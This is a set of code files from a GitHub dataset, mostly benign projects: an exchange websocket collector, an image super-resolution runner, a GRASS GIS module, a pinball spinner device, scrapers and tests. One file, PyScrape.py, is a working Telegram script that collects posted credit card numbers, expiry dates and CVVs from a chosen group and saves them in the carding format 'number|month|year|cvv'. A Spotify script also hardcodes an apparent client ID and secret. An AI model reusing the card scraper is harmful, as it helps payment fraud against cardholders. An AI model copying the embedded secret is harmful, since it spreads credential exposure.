event_dict['symbol'] = symbol\n event_dict['data'] = json.dumps(data)\n event_dict = json.dumps(event_dict)\n r.publish(key_name, event_dict)\n r.publish(config_collect.CHANNEL, event_dict)\n r[key_name] = str(data)\n r.lpush(config_collect.LPUSH_RECORD_MQ, event_dict)\n\n\ndef okex_on_error(ws, error):\n print('error: {}'.format(error))\n\n\ndef okex_on_close(ws):\n print(\"Connection okex closed ……\")\n\n\ndef okex_on_open(ws):\n global symbol_list\n global type_list\n for symbol in symbol_list:\n symbol = symbol.upper().replace('_', '-')\n channel_list = []\n for type in type_list:\n channel_dict = {}\n if (type == 'ticker'):\n channel_dict['channel'] = 'tickers'\n channel_dict['instId'] = symbol\n elif (type == 'depth'):\n channel_dict['channel'] = 'books5'\n channel_dict['instId'] = symbol\n elif (type == 'depthall'):\n channel_dict['channel'] = 'books-l2-tbt'\n channel_dict['instId'] = symbol\n elif (type == 'trade'):\n channel_dict['channel'] = 'trades'\n channel_dict['instId'] = symbol\n elif (type == 'kline'):\n channel_dict['channel'] = 'candle1m'\n channel_dict['instId'] = symbol\n channel_list.append(channel_dict)\n sub_param = {\"op\": \"subscribe\", \"args\": channel_list}\n req = json.dumps(sub_param)\n ws.send(req)\n\n\ndef main(symbol_list_, type_list_):\n global exchange\n global symbol_list\n global type_list\n global pool\n exchange = 'okex'\n symbol_list = symbol_list_\n type_list = type_list_\n pool = redis.ConnectionPool(host=config_collect.REDIS_HOST, port=config_collect.REDIS_PORT, db=0)\n url = 'wss://ws.okex.com:8443/ws/v5/public'\n websocket.enableTrace(True)\n ws = websocket.WebSocketApp(url,\n on_message=okex_on_message,\n on_error=okex_on_error,\n on_close=okex_on_close)\n ws.on_open = okex_on_open\n ws.run_forever(ping_timeout=3)\n","repo_name":"Maxwellpower1/fsb","sub_path":"dao_quote/dao_quote/util/exchange_api/okex/wss_okex_v5.py","file_name":"wss_okex_v5.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"19001232399","text":"#!/usr/bin/env python\n\nif __name__ == '__main__':\n import argparse\n import sys\n import tensorflow as tf\n from model import Model\n\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('mode', type=str, help='operating mode (train or generate)')\n parser.add_argument('--model', type=str, default='./saved_model/model.ckpt')\n parser.add_argument('--input', type=str, nargs='+', default=['./input/input.JPEG'])\n parser.add_argument('--batch-size', type=int, default=512)\n parser.add_argument('--subimage-size', type=int, default=33)\n\n args = parser.parse_args()\n\n def reshape_for_output(image):\n shape = image.shape\n if len(shape) > 3:\n shape = shape[1:]\n return image.reshape(shape)*255\n\n def write_image_to_file(image, filename):\n image = reshape_for_output(image)\n images_out = tf.image.encode_jpeg(image)\n fh = open(filename, \"wb+\")\n fh.write(images_out.eval())\n fh.close()\n\n\n if args.mode == 'train':\n from train import Trainer\n from files import FileReader\n m = Model(batch_size=args.batch_size)\n m.build_model()\n with tf.Session() as sess:\n t = Trainer(sess, m)\n f = FileReader('./images/sets/train/*.JPEG', (args.subimage_size, args.subimage_size), batch_size=args.batch_size)\n v = FileReader('./images/sets/validation/*.JPEG', (args.subimage_size, args.subimage_size), batch_size=args.batch_size)\n\n sess.run(tf.global_variables_initializer())\n saver = 
tf.train.Saver(tf.trainable_variables())\n try:\n saver.restore(sess, args.model)\n except:\n print('No save file found. Creating new file at {}'.format(args.model));\n f.start_queue_runners()\n v.start_queue_runners()\n t.train(f.get_batch(), saver=saver, path=args.model, val=v.get_batch())\n v.stop_queue_runners()\n f.stop_queue_runners()\n elif args.mode == 'generate':\n if args.input is None:\n print(\"must provide an input file in generate mode\")\n sys.exit(1)\n from files import FileReader\n from validation import produce_low_resolution as plr\n m = Model(is_training=False)\n m.build_model()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver(tf.trainable_variables())\n try:\n saver.restore(sess, args.model)\n except:\n print('Could not load model file: {}!'.format(args.model))\n sys.exit(1)\n # Generate new images here\n filename_queue = tf.train.string_input_producer(args.input)\n image_reader = tf.WholeFileReader()\n _, image_file = image_reader.read(filename_queue)\n image = tf.image.decode_jpeg(image_file, channels=3)\n # Crop the image to the desired size\n crop_shape = tf.concat([(256,256), [3]], 0)\n cropped = tf.random_crop(image, crop_shape)\n cropped = tf.cast(cropped, tf.float32)/255.\n\n batch = tf.train.batch([cropped], batch_size=1)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n output, bicubic = sess.run([m.image_output, m.bicubic], feed_dict={m.input: batch.eval()})\n\n coord.request_stop()\n coord.join(threads)\n # Calculate PSNR gain for each one\n write_image_to_file(output, './outputs/output.jpg')\n\n write_image_to_file(bicubic, './outputs/bicubic.jpg')\n else:\n print('Invalid \"mode\": {}!'.format(args.mode))\n sys.exit(0)\n","repo_name":"calebzulawski/image-super-resolution","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"38180496447","text":"import grass.script as grass\nfrom grass.exceptions import CalledModuleError\n\n############################################################################\n\n\ndef main():\n # lazy imports\n import grass.temporal as tgis\n\n # Get the options\n input = options[\"input\"]\n output = options[\"output\"]\n method = options[\"method\"]\n quantile = options[\"quantile\"]\n order = options[\"order\"]\n memory = options[\"memory\"]\n nprocs = options[\"nprocs\"]\n where = options[\"where\"]\n max_files_open = int(options[\"file_limit\"])\n add_time = flags[\"t\"]\n nulls = flags[\"n\"]\n\n # Check if number of methods and output maps matches\n if \"quantile\" in method:\n len_method = len(method.split(\",\")) - 1\n else:\n len_method = len(method.split(\",\"))\n\n if (len(list(filter(None, quantile.split(\",\")))) + len_method) != len(\n output.split(\",\")\n ):\n grass.fatal(_(\"Number requested methods and output maps do not match.\"))\n\n # Make sure the temporal database exists\n tgis.init()\n\n sp = tgis.open_old_stds(input, \"strds\")\n\n rows = sp.get_registered_maps(\"id\", where, order, None)\n\n if rows:\n # Create the r.series input file\n filename = grass.tempfile(True)\n file = open(filename, \"w\")\n\n for row in rows:\n string = \"%s\\n\" % (row[\"id\"])\n file.write(string)\n\n file.close()\n\n flag = \"\"\n if len(rows) > max_files_open:\n grass.warning(\n _(\n \"Processing over {} maps: activating -z flag of r.series which slows down processing.\".format(\n 
max_files_open\n )\n )\n )\n flag += \"z\"\n if nulls:\n flag += \"n\"\n\n try:\n grass.run_command(\n \"r.series\",\n flags=flag,\n file=filename,\n output=output,\n overwrite=grass.overwrite(),\n method=method,\n quantile=quantile,\n memory=memory,\n nprocs=nprocs,\n )\n except CalledModuleError:\n grass.fatal(_(\"%s failed. Check above error messages.\") % \"r.series\")\n\n if not add_time:\n # We need to set the temporal extent from the subset of selected maps\n maps = sp.get_registered_maps_as_objects(\n where=where, order=order, dbif=None\n )\n first_map = maps[0]\n last_map = maps[-1]\n start_a, end_a = first_map.get_temporal_extent_as_tuple()\n start_b, end_b = last_map.get_temporal_extent_as_tuple()\n\n if end_b is None:\n end_b = start_b\n\n if first_map.is_time_absolute():\n extent = tgis.AbsoluteTemporalExtent(start_time=start_a, end_time=end_b)\n else:\n extent = tgis.RelativeTemporalExtent(\n start_time=start_a,\n end_time=end_b,\n unit=first_map.get_relative_time_unit(),\n )\n\n for out_map in output.split(\",\"):\n # Create the time range for the output map\n if out_map.find(\"@\") >= 0:\n id = out_map\n else:\n mapset = grass.gisenv()[\"MAPSET\"]\n id = out_map + \"@\" + mapset\n\n map = sp.get_new_map_instance(id)\n map.load()\n\n map.set_temporal_extent(extent=extent)\n\n # Register the map in the temporal database\n if map.is_in_db():\n map.update_all()\n else:\n map.insert()\n\n\nif __name__ == \"__main__\":\n options, flags = grass.parser()\n main()\n","repo_name":"OSGeo/grass","sub_path":"temporal/t.rast.series/t.rast.series.py","file_name":"t.rast.series.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"19"} +{"seq_id":"17708517764","text":"class Solution:\n def findingUsersActiveMinutes(self, logs: List[List[int]], k: int) -> List[int]:\n result = [0] * k\n \n logs_dict = dict()\n \n for log in logs:\n if logs_dict.get(log[0]) is None:\n logs_dict[log[0]] = set()\n logs_dict[log[0]].add(log[1])\n \n for key, item in logs_dict.items():\n result[len(item) - 1] += 1\n \n return result\n \n","repo_name":"tnals5152/coding-practice","sub_path":"leetcode/medium/1817. Finding the Users Active Minutes.py","file_name":"1817. Finding the Users Active Minutes.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71404159403","text":"import requests\nfrom bs4 import BeautifulSoup\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\n\n\n# user_date = input(\"Which year do you want to travel to? 
Type the date in this format YYYY-MM-DD: \")\n# response = requests.get(url=f\"https://www.billboard.com/charts/hot-100/{user_date}/\")\nresponse = requests.get(url=f\"https://www.billboard.com/charts/hot-100/2000-08-12/\")\nsongs_response = response.text\n\n\nsoup = BeautifulSoup(songs_response, 'html.parser')\n\nsongs_title = soup.find_all(name=\"h3\", id=\"title-of-a-story\")\n\nsongs = []\nfor x in songs_title[6::2]:\n songs.append(x.getText().split('\\n'))\n\nlist_songs = []\nfor song in songs[::2]:\n list_songs.append(song[1])\n\n\n# SPOTIFY\n\nCLIENT_ID = \"f57de8bd23b24aeea99799dcb92d8510\"\nCLIENT_SECRET = \"1ddf6a8ce423492789ec83a3251c9edd\"\n\n\nsp = spotipy.Spotify(\n auth_manager=SpotifyOAuth(\n client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET,\n redirect_uri=\"https://www.billboard.com/charts/hot-100/2000-08-12/\",\n scope=\"user-library-read\",\n cache_path='.cache',\n show_dialog=True\n )\n)\n\nresults = sp.current_user_saved_tracks()\nfor idx, item in enumerate(results['items']):\n track = item['track']\n print(idx, track['artists'][0]['name'], \" – \", track['name'])\n\n# 3 STEP\nuser_id = sp.current_user()[\"id\"]\ndate = \"2000-08-12\"\nsong_names = [\"The list of song\", \"titles from your\", \"web scrape\"]\n\nsong_uris = []\nyear = date.split(\"-\")[0]\nfor song in song_names:\n result = sp.search(q=f\"track:{song} year:{year}\", type=\"track\")\n print(result)\n try:\n uri = result[\"tracks\"][\"items\"][0][\"uri\"]\n song_uris.append(uri)\n except IndexError:\n print(f\"{song} doesn't exist in Spotify. Skipped.\")\n\n\n\n# 4 STEP\n\n\nplaylist = sp.user_playlist_create(user=user_id, name=f\"{date} Billboard 100\", public=False)\nprint(playlist)\n\n#Adding songs found into the new playlist\nsp.playlist_add_items(playlist_id=playlist[\"id\"], items=song_uris)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aruneshkumar324/100-Days-Python","sub_path":"46-Day/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24094002274","text":"#!/usr/bin/python\n\nimport parser\nimport html_printer\nimport sys\nimport abbreviation\nimport person\nimport re\nimport os\n\ndef make_html(instream, outstream, title):\n\tp = parser.parser()\n\tprinter = html_printer.printer(outstream)\n\thtml_printer.prelude(outstream, title)\n\n\tj = p.parse(instream, sys.argv[1])\n\n\tamapper = abbreviation.mapper()\n\tfor i in j:\n\t\tfor k in i.results:\n\t\t\tamapper.analyse_result(k)\n\n\tremapper = abbreviation.remapper(amapper.shorts)\n\tpeo = person.analyser()\n\tfor i in j:\n\t\tfor k in i.results:\n\t\t\tremapper.fix_result(k)\n\t\t\tpeo.analyse_result(k)\n\n\tfor i in j:\n\t\tprinter.print_comp(i)\n\t\tprint >>outstream, \"\\n\"\n\n\tprint >>outstream, \"

Per-person summary\nNote: you can click the table headings for different sortings
    \"\n\tpp = html_printer.personlist_printer(peo.people.values(), True, outstream)\n\tpp.print_people()\n\nif len(sys.argv) != 3:\n\tprint >>sys.stderr, \"Usage \", sys.argv[0], \" input-file output-file\"\n\tsys.exit(1)\n\ntitle = re.sub(\".txt$\", \"\", sys.argv[1])\ntitle = re.sub(\"^.*/\", \"\", title)\noutfile = file(sys.argv[2], \"w\")\ninfile = file(sys.argv[1], \"r\")\nmake_html(infile, outfile, title)\n","repo_name":"wmanley/BAR-Results-Parser","sub_path":"src/make_html.py","file_name":"make_html.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"42115802359","text":"\"\"\"Contains the base classes for spinners.\"\"\"\n\nfrom mpf.core.enable_disable_mixin import EnableDisableMixinSystemWideDevice\n\nfrom mpf.core.delays import DelayManager\nfrom mpf.core.device_monitor import DeviceMonitor\nfrom mpf.core.system_wide_device import SystemWideDevice\nfrom mpf.exceptions.config_file_error import ConfigFileError\n\n\nMYPY = False\nif MYPY: # pragma: no cover\n from mpf.core.machine import MachineController # pylint: disable-msg=cyclic-import,unused-import\n\n\n@DeviceMonitor(_active=\"active\", _idle=\"idle\")\nclass Spinner(EnableDisableMixinSystemWideDevice, SystemWideDevice):\n\n \"\"\"Represents a spinner or spinner group in a pinball machine.\"\"\"\n\n config_section = 'spinners'\n collection = 'spinners'\n class_label = 'spinner'\n\n __slots__ = [\"hits\", \"_active_ms\", \"_active\", \"_idle\", \"delay\"]\n\n def __init__(self, machine: \"MachineController\", name: str) -> None:\n \"\"\"initialize spinner device.\"\"\"\n super().__init__(machine, name)\n self._active = False\n self._idle = True\n self._active_ms = None\n self.hits = None\n self.delay = DelayManager(machine)\n self.enabled = True # Default to enabled\n\n async def _initialize(self):\n await super()._initialize()\n self.hits = 0\n # Cache this value because it's used a lot in rapid succession\n self._active_ms = self.config['active_ms']\n # Can't read the switch until the switch controller is set up\n self.machine.events.add_handler('init_phase_4',\n self._register_switch_handlers, priority=1)\n\n def _register_switch_handlers(self, **kwargs):\n del kwargs\n\n labels = dict(zip(self.config['switches'], self.config['labels'])) if self.config['labels'] else None\n for switch in self.config['switches']:\n callback_kwargs = {\"label\": labels[switch]} if labels else None\n # register for notification of switch active state\n self.machine.switch_controller.add_switch_handler_obj(\n switch,\n self._update_state_from_switch, 1, callback_kwargs=callback_kwargs)\n\n def _update_state_from_switch(self, **kwargs):\n if not self.enabled:\n return\n label = kwargs.get(\"label\")\n if not self._active:\n self.machine.events.post(\"spinner_{}_active\".format(self.name), label=label)\n '''event: spinner_(name)_active\n desc: The idle spinner (name) was just hit and became active.\n\n This event will post whenever a spinner switch is hit and the spinner\n is not already active.\n\n args:\n label: The label of the switch that triggered the activation\n '''\n if label:\n self.machine.events.post(\"spinner_{}_{}_active\".format(self.name, label))\n '''event: spinner_(name)_(label)_active\n desc: The idle spinner (name) was just hit and became active.\n\n This event will post whenever a spinner switch is hit and the spinner\n is not already active, but only if labels are defined for the spinner.\n '''\n self._active = True\n 
self._idle = False\n self.hits += 1\n self.machine.events.post(\"spinner_{}_hit\".format(self.name), hits=self.hits, label=label)\n '''event: spinner_(name)_hit\n desc: The spinner (name) was just hit.\n\n This event will post whenever a spinner switch is hit.\n\n args:\n hits: The number of switch hits the spinner has had since it became active\n label: The label of the switch that was hit\n '''\n if label:\n self.machine.events.post(\"spinner_{}_{}_hit\".format(self.name, label))\n '''event: spinner_(name)_(label)_hit\n desc: The spinner (name) was just hit on the switch labelled (label).\n\n This event will post whenever a spinner switch is hit and labels\n are defined for the spinner\n '''\n self.delay.clear()\n self.delay.add(self._active_ms, self._deactivate)\n\n def _deactivate(self, **kwargs):\n \"\"\"Post an 'inactive' event after no switch hits for the active_ms duration.\"\"\"\n del kwargs\n self.machine.events.post(\"spinner_{}_inactive\".format(self.name), hits=self.hits)\n '''event: spinner_(name)_inactive\n desc: The spinner (name) is no longer receiving hits\n\n This event will post whenever a spinner has not received hits and\n its active_ms has timed out.\n\n args:\n hits: The number of switch hits the spinner had while it was active\n '''\n self._active = False\n if self.config['idle_ms']:\n self.delay.add(self.config['idle_ms'], self._on_idle)\n if self.config['reset_when_inactive']:\n self.hits = 0\n else:\n self._idle = True\n\n def _on_idle(self, **kwargs):\n \"\"\"Post an 'idle' event if the spinner has been inactive for the idle_ms duration.\"\"\"\n del kwargs\n self.machine.events.post(\"spinner_{}_idle\".format(self.name), hits=self.hits)\n '''event: spinner_(name)_idle\n desc: The spinner (name) is now idle\n\n This event will post whenever a spinner has not received hits and\n its idle_ms has timed out. 
If no idle_ms is defined, this event\n will not post.\n\n args:\n hits: The number of switch hits the spinner had while it was active\n '''\n self.hits = 0\n self._idle = True\n\n def validate_and_parse_config(self, config: dict, is_mode_config: bool, debug_prefix: str = None):\n \"\"\"Validate and parse spinner config.\"\"\"\n config = super().validate_and_parse_config(config, is_mode_config, debug_prefix)\n for switch in config['switch']:\n if switch not in config['switches']:\n config['switches'].append(switch)\n\n if config['labels'] and len(config['labels']) != len(config['switches']):\n raise ConfigFileError(\"Spinner labels must be the same number as switches\", 1, self.name)\n\n return config\n\n @property\n def active(self):\n \"\"\"Return whether the spinner is actively spinning.\"\"\"\n return self._active\n\n @property\n def idle(self):\n \"\"\"Return whether the spinner is idle.\"\"\"\n return self._idle\n","repo_name":"missionpinball/mpf","sub_path":"mpf/devices/spinner.py","file_name":"spinner.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"19"} +{"seq_id":"25296741455","text":"'''\n\n用web浏览器控件(QWebEngineView)显示网页\nPyqt5和web的交互技术\n同时使用python和web开发程序,混合开发\n\nPython+JavaScript+html+Css\n\nQWebEngineView\n\n'''\n\nimport sys,math\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt, QTimer, QDateTime, pyqtSignal, QThread, QUrl\nimport os\n\n\nclass WebEngineView(QMainWindow):\n def __init__(self):\n super(WebEngineView, self).__init__()\n self.setWindowTitle('打开外部网页例子')\n self.setGeometry(5,30,1355,730)\n self.initUI()\n\n def initUI(self):\n self.browser=QWebEngineView()\n\n #显示网页\n #self.browser.load(QUrl('https://www.jd.com'))\n #显示本地页面\n url=os.getcwd()+'/test.html'\n #self.browser.load(QUrl.fromLocalFile(url))\n\n #显示嵌入web代码页面\n self.browser.setHtml(\n '''\n \n\n\n \n 测试页面\n\n\n

{"seq_id":"25296741455","text":"'''\n\nDisplay a web page with the web-browser widget (QWebEngineView)\nPyQt5 <-> web interaction techniques\nBuild a program with Python and web tech at the same time (hybrid development)\n\nPython+JavaScript+html+Css\n\nQWebEngineView\n\n'''\n\nimport sys,math\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt, QTimer, QDateTime, pyqtSignal, QThread, QUrl\nimport os\n\n\nclass WebEngineView(QMainWindow):\n def __init__(self):\n super(WebEngineView, self).__init__()\n self.setWindowTitle('Example: opening an external web page')\n self.setGeometry(5,30,1355,730)\n self.initUI()\n\n def initUI(self):\n self.browser=QWebEngineView()\n\n # display a remote web page\n #self.browser.load(QUrl('https://www.jd.com'))\n # display a local page\n url=os.getcwd()+'/test.html'\n #self.browser.load(QUrl.fromLocalFile(url))\n\n # display an inline (embedded) HTML page\n self.browser.setHtml(\n '''\n <html>\n <head>\n <title>Test Page</title>\n </head>\n <body>\n <h1>Hello world PyQt5</h1>\n <h1>Hello world PyQt5</h1>\n <h1>Hello world PyQt5</h1>\n <h1>Hello world PyQt5</h1>\n <h1>Hello world PyQt5</h1>
</body>\n </html>\n ''')\n\n self.setCentralWidget(self.browser)\n\n\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = WebEngineView()\n main.show()\n\n sys.exit(app.exec_())","repo_name":"zstar2013/pyqt5","sub_path":"src/web/webEngineView.py","file_name":"webEngineView.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
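The record above only loads content into the view; the Python <-> JavaScript interaction its header promises would go through `QWebEnginePage.runJavaScript()`, which evaluates JS inside the loaded page and passes the result to a Python callback. A small sketch of a method that could be added to the `WebEngineView` class and called once the page has loaded (e.g. from the `loadFinished` signal):

```python
# Sketch: run JavaScript in the embedded page and read the result back.
def show_title(self):
    def on_result(value):
        print('document.title =', value)
    self.browser.page().runJavaScript('document.title', on_result)
```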
{"seq_id":"1068110683","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\nimport Stadium\nimport Manager\n\ndef main(website):\n res = requests.get(website, headers={'User-Agent': 'Mozilla/5.0'})\n content = BeautifulSoup(res.content, 'lxml')\n\n #Team Name#\n\n for HTMLDiv in content.find_all(class_=\"dataName\"):\n for HTMLH1 in HTMLDiv.find_all(\"h1\"):\n if HTMLH1.attrs[\"itemprop\"] == \"name\":\n for HTMLSpan in HTMLH1.find_all(\"span\"):\n TeamName = HTMLSpan.string\n\n for HTMLDiv in content.find_all(class_=\"dataZusatzDaten\"):\n for HTMLSpan in HTMLDiv.find_all(\"span\", class_=\"hauptpunkt\"):\n for HTMLA in HTMLSpan.find_all(\"a\"):\n TeamLeague = HTMLA.string.strip()\n\n for HTMLDiv in content.find_all(class_=\"dataBottom\"):\n dataDaten = 0\n for HtMLDaten in content.find_all(class_=\"dataDaten\"):\n dataDaten = dataDaten + 1\n if dataDaten == 2:\n HTMLPCount = 0\n for HTMLP in HtMLDaten.find_all(\"p\"):\n HTMLPCount = HTMLPCount + 1\n if HTMLPCount == 2:\n for HTMLSpan in HTMLP.find_all(\"span\", class_=\"dataValue\"):\n for HTMLAStadium in HTMLSpan.find_all(\"a\"):\n StadiumName = HTMLAStadium.string.replace(\"'\", \"\")\n StadiumWebsite = HTMLAStadium.attrs[\"href\"]\n StadiumWebsite = \"https://www.transfermarkt.co.uk\" + StadiumWebsite\n Stadium.stadium(StadiumWebsite)\n\n for HTMLDiv in content.find_all(class_=\"container-hauptinfo\"):\n for HTMLDivA in HTMLDiv.find_all(\"a\"):\n ManagerWebsite = HTMLDivA.attrs[\"href\"]\n ManagerWebsite = \"https://www.transfermarkt.co.uk\" + ManagerWebsite\n Manager.main(ManagerWebsite,\"manager\")\n\n\nif __name__ == '__main__':\n Website = \"https://www.transfermarkt.co.uk/crawley-town/transfers/verein/3537/saison_id/2020\"\n main(Website)\n","repo_name":"spyfire14/FootballAnalysis","sub_path":"Club/Club_Loader.py","file_name":"Club_Loader.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"20678140572","text":"from flask_testing import LiveServerTestCase\nfrom selenium import webdriver \nfrom urllib.request import urlopen\nfrom flask import url_for\nfrom application import app, db\n# We don't need everything from these files -> just the things we are testing\nfrom application.models import Task\nfrom application.forms import ToDoForm\n\nclass TestBase(LiveServerTestCase):\n TEST_PORT = 5050\n\n def create_app(self):\n app.config.update(\n SQLALCHEMY_DATABASE_URI = 'sqlite:///test-app.db',\n LIVESERVER_PORT = self.TEST_PORT,\n DEBUG = True,\n TESTING = True\n )\n return app\n\n def setUp(self):\n # for this test we do need to add sample data\n # if we were updating an existing record - we would need to add it here \n db.create_all()\n options = webdriver.chrome.options.Options()\n # makes it so we don't have a GUI - everything runs in the terminal\n options.add_argument('--headless')\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-dev-shm-usage\")\n self.driver = webdriver.Chrome(options=options)\n self.driver.get(f'http://localhost:{self.TEST_PORT}/add-task/')\n\n def tearDown(self):\n self.driver.quit()\n db.session.remove()\n db.drop_all()\n\n def test_server_connectivity(self):\n response = urlopen(f'http://localhost:{self.TEST_PORT}/add-task/')\n assert response.status == 200\n\nclass TestAddPost(TestBase):\n def submit_input(self, test_case):\n name_field = self.driver.find_element_by_xpath('/html/body/div[1]/form/input[2]')\n description_field = self.driver.find_element_by_xpath('/html/body/div[1]/form/textarea')\n due_date_field = self.driver.find_element_by_xpath('/html/body/div[1]/form/input[3]')\n submit_field = self.driver.find_element_by_xpath('/html/body/div[1]/form/input[5]')\n\n # we will be sending the test case as a tuple\n name_field.send_keys(test_case[0])\n description_field.send_keys(test_case[1])\n due_date_field.click()\n due_date_field.send_keys(test_case[2])\n submit_field.click()\n\n def test_add_post(self):\n test_case = \"Test 1\", \"Hello World\", \"31052023\"\n self.submit_input(test_case)\n\n assert list(Task.query.all()) != []\n assert Task.query.filter_by(name=\"Test 1\").first() is not None\n\n def test_add_post_validation(self):\n test_case = \"\", \"Hello World\", \"2022/07/28\"\n self.submit_input(test_case)\n\n assert list(Task.query.all()) == []\n assert Task.query.filter_by(name=\"\").first() is None","repo_name":"ahsansabir30/to-do-app","sub_path":"test/test_integration_addpost.py","file_name":"test_integration_addpost.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"42907735671","text":"import os\nimport re\nimport asyncio\nfrom dotenv import load_dotenv\nfrom telethon import TelegramClient, events\n\nload_dotenv()\n\nif os.path.exists('.env'):\n update = input(\"The .env file already exists, Do you want to update your API credentials? 
(y/n) \")\n if update.lower() == 'y':\n api_id = input(\"Enter your API ID: \")\n api_hash = input(\"Enter your API hash: \")\n group_id = input(\"Enter the group ID to scrape: \")\n session_name = input(\"Enter a name for your session: \")\n with open('.env', 'w') as f:\n f.write(f\"API_ID={api_id}\\n\")\n f.write(f\"API_HASH={api_hash}\\n\")\n f.write(f\"GROUP_ID={group_id}\\n\")\n f.write(f\"SESSION_NAME={session_name}\\n\")\n else:\n api_id = int(os.getenv('API_ID'))\n api_hash = os.getenv('API_HASH')\n group_id = int(os.getenv('GROUP_ID'))\n session_name = os.getenv('SESSION_NAME')\nelse:\n api_id = input(\"Enter your API ID: \")\n api_hash = input(\"Enter your API hash: \")\n group_id = input(\"Enter the group ID to scrape: \")\n session_name = input(\"Enter a name for your session: \")\n with open('.env', 'w') as f:\n f.write(f\"API_ID={api_id}\\n\")\n f.write(f\"API_HASH={api_hash}\\n\")\n f.write(f\"GROUP_ID={group_id}\\n\")\n f.write(f\"SESSION_NAME={session_name}\\n\")\n\nclient = TelegramClient(session_name, api_id, api_hash)\n\nasync def extract_card_info(message):\n text = message.message\n match = re.search(r'\\b\\d{15,16}\\b', text)\n if match:\n card_number = match.group().replace(' ', '')\n month_match = re.search(r'(\\b0?[1-9]\\b|\\b1[0-2]\\b)[^\\d]+(\\d{2}|\\d{4})', text)\n if month_match:\n month = month_match.group(1).zfill(2)\n year = month_match.group(2)\n if len(year) == 2:\n year = '20' + year\n cvv_match = re.search(r'\\b\\d{3}\\b', text)\n if cvv_match:\n cvv = cvv_match.group()\n formatted_message = f\"{card_number}|{month}|{year}|{cvv}\"\n with open('card_info.txt', 'a') as f:\n f.write(formatted_message + '\\n')\n print(f'Card info extracted: {formatted_message}')\n\n@client.on(events.NewMessage(chats=[group_id]))\nasync def extract_new_card_info(event):\n message = event.message\n await extract_card_info(message)\n\nasync def main():\n await client.start()\n await client.run_until_disconnected()\n\nif __name__ == '__main__':\n asyncio.run(main())\n\n","repo_name":"PyCHKnet/CC-Scraping-Telegram","sub_path":"PyScrape.py","file_name":"PyScrape.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39486997167","text":"from netCDF4 import Dataset\nimport numpy as np\nimport math\n\ndef find_density(t, mapping):\n min_diff = 9999\n tmp = 0\n for m in mapping:\n d = abs(t-m)\n if d < min_diff:\n tmp = m\n min_diff = d\n return mapping[tmp]\n\n\n\ndef get_wind_data():\n CP = 0.4\n\n mapping = {\n -40: 1.514,\n -35: 1.4843,\n -30: 1.395,\n -25: 1.4243,\n -10: 1.399,\n -5: 1.3178,\n 0: 1.269,\n 10: 1.247,\n 15: 1.225,\n 20: 1.204,\n 25: 1.184,\n 30: 1.165,\n 40: 1.127,\n 50: 1.109\n }\n\n fh = Dataset(\"./cropped_wind.nc\", \"r\", format=\"NETCDF4\")\n# fh = Dataset(\"../PythonWorkplace/datasets/wind.nc\", \"r\", format=\"NETCDF4\")\n\n # latbounds = [35.01186, 41.50306]\n # lonbounds = [19.91975, 28.2225]\n\n lons = fh.variables['longitude'][:]\n lats = fh.variables['latitude'][:]\n tmax = fh.variables['time'][:]\n tmax_units = fh.variables['time'].units\n\n temp = fh.variables['t2m'][:] - 273.15\n pressure = fh.variables['sp'][:]\n\n u10 = fh.variables['u10'][:]\n v10 = fh.variables['v10'][:]\n\n np_u10 = np.array(u10)**2\n np_v10 = np.array(v10)**2\n\n speed = np.sqrt(np.add(np_u10, np_v10))\n\n nullified_speed = np.where([(speed > 3) & (speed < 25)], speed, 0)\n #nullified_speed = np.where([(speed > 3) & (speed < 25)], speed, speed)\n\n #import ipdb; 
ipdb.set_trace()\n\n vec_func = np.vectorize(find_density)\n c = np.array(temp)\n\n density = np.array(vec_func(c, mapping))\n \n return (nullified_speed, density, CP, tmax, lons, lats)\n\nif __name__ == '__main__':\n get_wind_data()\n","repo_name":"V4570/earth_wind_fire","sub_path":"wind_speed.py","file_name":"wind_speed.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
